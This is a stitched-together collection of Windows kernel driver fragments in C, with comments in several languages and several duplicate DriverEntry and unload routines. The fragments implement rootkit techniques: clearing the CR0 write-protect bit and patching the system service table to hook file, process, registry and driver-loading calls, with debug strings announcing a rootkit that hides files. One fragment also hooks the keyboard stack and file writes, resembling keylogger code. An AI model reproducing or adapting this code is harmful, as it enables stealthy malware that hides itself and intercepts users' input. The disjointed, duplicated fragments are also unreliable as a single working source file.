VOID OnUnload( IN PDRIVER_OBJECT DriverObject ) { DbgPrint("Rootkit: OnUnload called\n"); // UNProtect memory __asm { push eax mov eax, CR0 and eax, 0FFFEFFFFh mov CR0, eax pop eax } // put back the old function pointer InterlockedExchange( (PLONG) &SYSTEMSERVICE(ZwQueryDirectoryFile), (LONG) OldZwQueryDirectoryFile); InterlockedExchange( (PLONG) &SYSTEMSERVICE(ZwQuerySystemInformation), (LONG) OldZwQuerySystemInformation); // REProtect memory __asm { push eax mov eax, CR0 or eax, NOT 0FFFEFFFFh mov CR0, eax pop eax } }
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath ) { int i; DbgPrint("My Driver Loaded!"); GetProcessNameOffset(); // Register a dispatch function for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++) { theDriverObject->MajorFunction[i] = OnStubDispatch; } theDriverObject->DriverUnload = OnUnload; // save old system call locations OldZwQueryDirectoryFile=(ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)); OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)); // hook system calls _asm cli (ZWQUERYDIRECTORYFILE) (SYSTEMSERVICE(ZwQueryDirectoryFile))= NewZwQueryDirectoryFile; (ZWQUERYSYSTEMINFORMATION) (SYSTEMSERVICE(ZwQuerySystemInformation))= NewZwQuerySystemInformation; _asm sti return STATUS_SUCCESS; }
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath) { DbgPrint("--- LOAD - HOOK ---"); pDriverObject->DriverUnload = unload; TrueZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION) SYSTEMSERVICE(ZwQuerySystemInformation); DbgPrint("ZwQuerySystemInformation okay"); __asm { push eax // on sauvegarde eax mov eax, CR0 // on met la valeur de CR0 dans eax and eax, 0FFFEFFFFh // on applique le filtre inverseur mov CR0, eax // on change la valeur de CR0 pop eax } DbgPrint("CR0 trick OK"); SYSTEMSERVICE(ZwQuerySystemInformation) = (unsigned long*) MyZwQuerySystemInformation; __asm { push eax mov eax, CR0 or eax, NOT 0FFFEFFFFh // l’opération inverse de tout à l’heure pour récupérer l’état de CR0 comme il était avant le hook mov CR0, eax pop eax // on récupère eax } DbgPrint("CR0 trick 2 OK"); DbgPrint("--- HOOK OK ---"); return STATUS_SUCCESS; }
VOID OnUnload( IN PDRIVER_OBJECT DriverObject ) { DbgPrint("ROOTKIT: OnUnload called\n"); // unhook system calls _asm cli (ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) =OldZwQueryDirectoryFile; (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = OldZwQuerySystemInformation; _asm sti }
void unHookSSDT() { DbgPrint("--- UNHOOKING ---"); __asm { push eax // on sauvegarde eax mov eax, CR0 // on met la valeur de CR0 dans eax and eax, 0FFFEFFFFh // on applique le filtre inverseur mov CR0, eax // on change la valeur de CR0 pop eax } DbgPrint("CR0 trick OK"); SYSTEMSERVICE(ZwQuerySystemInformation) = (ULONG *) TrueZwQuerySystemInformation; __asm { push eax mov eax, CR0 or eax, NOT 0FFFEFFFFh // l’opération inverse de tout à l’heure pour récupérer l’état de CR0 comme il était avant le hook mov CR0, eax pop eax // on récupère eax } DbgPrint("CR0 trick 2 OK"); DbgPrint("--- UNHOOKING OK ---"); }
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath ) { DbgPrint("Rootkit: WE ARE ALIVE! Start hiding files.\n"); GetProcessNameOffset(); theDriverObject->DriverUnload = OnUnload; // UNProtect memory __asm { push eax mov eax, CR0 and eax, 0FFFEFFFFh mov CR0, eax pop eax } // place the hook using InterlockedExchange (no need to disable interrupts) // this uses the LOCK instruction to lock the memory bus during the next instruction // Example: // LOCK INC DWORD PTR [EDX+04] // This staves off collisions on multi-processor machines, while cli/sti only disable interrupts // on the current processor. // OldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE) InterlockedExchange( (PLONG) &SYSTEMSERVICE(ZwQueryDirectoryFile), (LONG) NewZwQueryDirectoryFile); DbgPrint("%x",(PLONG) &SYSTEMSERVICE(ZwQueryDirectoryFile)); OldZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION) InterlockedExchange( (PLONG) &SYSTEMSERVICE(ZwQuerySystemInformation), (LONG) NewZwQuerySystemInformation); //add hide reg&files // REProtect memory __asm { push eax mov eax, CR0 or eax, NOT 0FFFEFFFFh mov CR0, eax pop eax } return STATUS_SUCCESS; }
/** * 设置钩子函数 * */ NTSTATUS sstHook_OpenProcess() { if(m_MDL == NULL) { m_MDL = MmCreateMdl(NULL,KeServiceDescriptorTable->ServiceTableBase,KeServiceDescriptorTable->NumberOfService*4); if(!m_MDL) return STATUS_UNSUCCESSFUL; MmBuildMdlForNonPagedPool(m_MDL); m_MDL->MdlFlags = m_MDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA; m_Mapped = (PVOID *)MmMapLockedPages(m_MDL, KernelMode); HOOK_SYSCALL(ZwOpenProcess,MyNtOpenProcess,pOriNtOpenProcess); g_openProcessId = (ULONG)SYSTEMSERVICE(ZwOpenProcess); return STATUS_SUCCESS; } UpdateService(SYSCALL_INDEX(ZwOpenProcess),(PVOID)MyNtOpenProcess); return STATUS_SUCCESS; }
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING theRegistryPath) { DriverObject->DriverUnload = OnUnload; DbgPrint("Driver cargado"); ZwOpenProcessIni =(TypZwOpenProc)(SYSTEMSERVICE(ZwOpenProcess)); //Creamos la MDL para deshabilitar la protección de memoria g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4); if(!g_pmdlSystemCall) return STATUS_UNSUCCESSFUL; MmBuildMdlForNonPagedPool(g_pmdlSystemCall); g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA; MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode); DbgPrint("Hookeando..."); HOOK_SYSCALL( ZwOpenProcess, NewZwOpenProcess, ZwOpenProcessIni ); return STATUS_SUCCESS; }
//------------------------------------------------------------------------------------ NTSTATUS HookApi() { SMFile posFile ; LARGE_INTEGER u64FileSize ; LARGE_INTEGER u64CurrentOffset; char strImageName[260]; ANSI_STRING TempImageName ; g_uPidList = 0 ; if ( !NT_SUCCESS(UnProtectSSDT(&MappedSystemCallTable) ) ) { return STATUS_UNSUCCESSFUL; } if ( !NT_SUCCESS (SMCreateFileForRead ( &posFile , L"\\??\\C:\\Warm.txt")) ) { return STATUS_UNSUCCESSFUL; } if ( !NT_SUCCESS (SMGetFileLength ( &posFile , &u64FileSize )) ) { SMCloseFile(&posFile); return STATUS_UNSUCCESSFUL; } if ( !NT_SUCCESS(SMReadFile( &posFile , strImageName , &u64FileSize.LowPart ))) { SMCloseFile(&posFile); return STATUS_UNSUCCESSFUL; } SMCloseFile(&posFile); strImageName[min(u64FileSize.LowPart,sizeof (strImageName)-1)] = '\0'; RtlInitAnsiString (&TempImageName,strImageName); if ( !NT_SUCCESS(RtlAnsiStringToUnicodeString (&g_uniImageName,&TempImageName,TRUE))) { return STATUS_UNSUCCESSFUL; } PsSetLoadImageNotifyRoutine ( LoadImageNotify ); PsSetCreateProcessNotifyRoutine(CreateProcessNotify , FALSE); oldZwCreateKey = (ZWCREATEKEY)(SYSTEMSERVICE(ZwCreateKey)); HOOK_SYSCALL (ZwCreateKey , newZwCreateKey ,oldZwCreateKey ); oldZwDeleteKey = (ZWDELETEKEY)(SYSTEMSERVICE(ZwDeleteKey)); HOOK_SYSCALL (ZwDeleteKey , newZwDeleteKey ,oldZwDeleteKey ); oldZwEnumerateKey = (ZWENUMERATEKEY)(SYSTEMSERVICE(ZwEnumerateKey)); HOOK_SYSCALL (ZwEnumerateKey , newZwEnumerateKey ,oldZwEnumerateKey ); oldZwEnumerateValueKey = (ZWENUMERATEVALUEKEY)(SYSTEMSERVICE(ZwEnumerateValueKey)); HOOK_SYSCALL (ZwEnumerateValueKey , newZwEnumerateValueKey ,oldZwEnumerateValueKey ); oldZwOpenKey = (ZWOPENKEY)(SYSTEMSERVICE(ZwOpenKey)); HOOK_SYSCALL (ZwOpenKey , newZwOpenKey ,oldZwOpenKey); oldZwQueryValueKey = (ZWQUERYVALUEKEY)(SYSTEMSERVICE(ZwQueryValueKey)); HOOK_SYSCALL (ZwQueryValueKey , newZwQueryValueKey ,oldZwQueryValueKey); oldZwSetValueKey = (ZWSETVALUEKEY)(SYSTEMSERVICE(ZwSetValueKey)); HOOK_SYSCALL (ZwSetValueKey , newZwSetValueKey ,oldZwSetValueKey); oldZwNotifyChangeKey = (ZWNOTIFYCHANGEKEY)(SYSTEMSERVICE(ZwNotifyChangeKey)); HOOK_SYSCALL (ZwNotifyChangeKey , newZwNotifyChangeKey ,oldZwNotifyChangeKey); oldZwLoadDriver = (ZWLOADDRIVER)(SYSTEMSERVICE(ZwLoadDriver)); HOOK_SYSCALL (ZwLoadDriver , newZwLoadDriver ,oldZwLoadDriver); oldZwUnloadDriver = (ZWUNLOADDRIVER)(SYSTEMSERVICE(ZwUnloadDriver)); HOOK_SYSCALL (ZwUnloadDriver , newZwUnloadDriver ,oldZwUnloadDriver); oldZwOpenProcess = (ZWOPENPROCESS)(SYSTEMSERVICE(ZwOpenProcess)); HOOK_SYSCALL (ZwOpenProcess , newZwOpenProcess,oldZwOpenProcess); oldZwOpenSection = (ZWOPENSECTION)(SYSTEMSERVICE(ZwOpenSection)); HOOK_SYSCALL (ZwOpenSection , newZwOpenSection,oldZwOpenSection); oldZwMapViewOfSection = (ZWMAPVIEWOFSECTION)(SYSTEMSERVICE(ZwMapViewOfSection)); HOOK_SYSCALL (ZwMapViewOfSection , newZwMapViewOfSection, oldZwMapViewOfSection); oldZwCreateSection = (ZWCREATESECTION)(SYSTEMSERVICE(ZwCreateSection)); HOOK_SYSCALL (ZwCreateSection , newZwCreateSection, oldZwCreateSection); oldZwCreateFile = (ZWCREATEFILE)(SYSTEMSERVICE(ZwCreateFile)); HOOK_SYSCALL (ZwCreateFile , newZwCreateFile, oldZwCreateFile); oldZwDeleteFile = (ZWDELETEFILE)(SYSTEMSERVICE(ZwDeleteFile)); HOOK_SYSCALL (ZwDeleteFile , newZwDeleteFile, oldZwDeleteFile); oldZwOpenFile = (ZWOPENFILE)(SYSTEMSERVICE(ZwOpenFile)); HOOK_SYSCALL (ZwOpenFile , newZwOpenFile, oldZwOpenFile); oldZwQueryVolumeInformationFile = (ZWQUERYVOLUMEINFORMATIONFILE)(SYSTEMSERVICE(ZwQueryVolumeInformationFile)); HOOK_SYSCALL (ZwQueryVolumeInformationFile , newZwQueryVolumeInformationFile, oldZwQueryVolumeInformationFile); oldZwSetVolumeInformationFile = (ZWSETVOLUMEINFORMATIONFILE)(SYSTEMSERVICE(ZwSetVolumeInformationFile)); HOOK_SYSCALL (ZwSetVolumeInformationFile , newZwSetVolumeInformationFile, oldZwSetVolumeInformationFile); oldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)); HOOK_SYSCALL (ZwQueryDirectoryFile , newZwQueryDirectoryFile, oldZwQueryDirectoryFile); oldZwFsControlFile = (ZWFSCONTROLFILE)(SYSTEMSERVICE(ZwFsControlFile)); HOOK_SYSCALL (ZwFsControlFile , newZwFsControlFile, oldZwFsControlFile); oldZwDeviceIoControlFile = (ZWDEVICEIOCONTROLFILE)(SYSTEMSERVICE(ZwDeviceIoControlFile)); HOOK_SYSCALL (ZwDeviceIoControlFile , newZwDeviceIoControlFile, oldZwDeviceIoControlFile); oldZwReadFile = (ZWREADFILE)(SYSTEMSERVICE(ZwReadFile)); HOOK_SYSCALL (ZwReadFile , newZwReadFile, oldZwReadFile); return STATUS_SUCCESS; }
bool _checkHookSafeOpenP() { return (g_openProcessId == (ULONG)SYSTEMSERVICE(ZwOpenProcess)) ? true : false ; }
/* * DriverEntry initializes the driver and is the first routine called by the * system after the driver is loaded. DriverEntry specifies the other entry * points in the function driver, such as EvtDevice and DriverUnload. * * @param DriverObject - represents the instance of the function driver that is loaded * into memory. DriverEntry must initialize members of DriverObject before it * returns to the caller. DriverObject is allocated by the system before the * driver is loaded, and it is released by the system after the system unloads * the function driver from memory. * @param RegistryPath - represents the driver specific path in the Registry. * The function driver can use the path to store driver related data between * reboots. The path does not store hardware instance specific data. * * @return STATUS_SUCCESS if successful, STATUS_UNSUCCESSFUL otherwise */ NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING RegistryPath ) { // Local variables NTSTATUS status; PDEVICE_EXTENSION devExt; PDEVICE_OBJECT devObj; UNICODE_STRING devName; UNICODE_STRING linkName; int counter; DbgPrint("%s - version %s", NAME, VERSION); DbgPrint("Built %s %s\n", __DATE__, __TIME__); // Set the basic dispatch routines for all IRPs handled for (counter = 0; counter < IRP_MJ_MAXIMUM_FUNCTION; counter++) { pDriverObject->MajorFunction[counter] = OutboundDispatchPassDown; } // Set a specific dispatch routine for read requests pDriverObject->MajorFunction[IRP_MJ_READ] = OutboundDispatchRead; // Hook the keyboard stack status = OutboundHookKeyboard(pDriverObject); if (!NT_SUCCESS(status)) DbgPrint("Error hooking the keyboard.\n"); else DbgPrint("Successfully hooked the keyboard.\n"); // Save old system call locations OldZwWriteFile = (ZWWRITEFILE)(SYSTEMSERVICE(ZwWriteFile)); OldZwCreateFile = (ZWCREATEFILE)(SYSTEMSERVICE(ZwCreateFile)); //***Begin HideProcessHookMDL SSDT hook code*** // Map the memory into our domain so we can change the permissions on the MDL. g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices * 4); if(!g_pmdlSystemCall) { DbgPrint("Failed mapping memory..."); return STATUS_UNSUCCESSFUL; } MmBuildMdlForNonPagedPool(g_pmdlSystemCall); // Change the flags of the MDL g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA; MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode); //TODO: use MmMapLockedPagesSpecifyCache instead, MmMapLockedPages is obselete according to OACR // Hook the system call _asm{cli} HOOK_SYSCALL(ZwWriteFile, NewZwWriteFile, OldZwWriteFile); HOOK_SYSCALL(ZwCreateFile, NewZwCreateFile, OldZwCreateFile); _asm{sti} //***End HideProcessHookMDL SSDT hook code*** // Set the driver unload routine pDriverObject->DriverUnload = Unload; return STATUS_SUCCESS; } // DriverEntry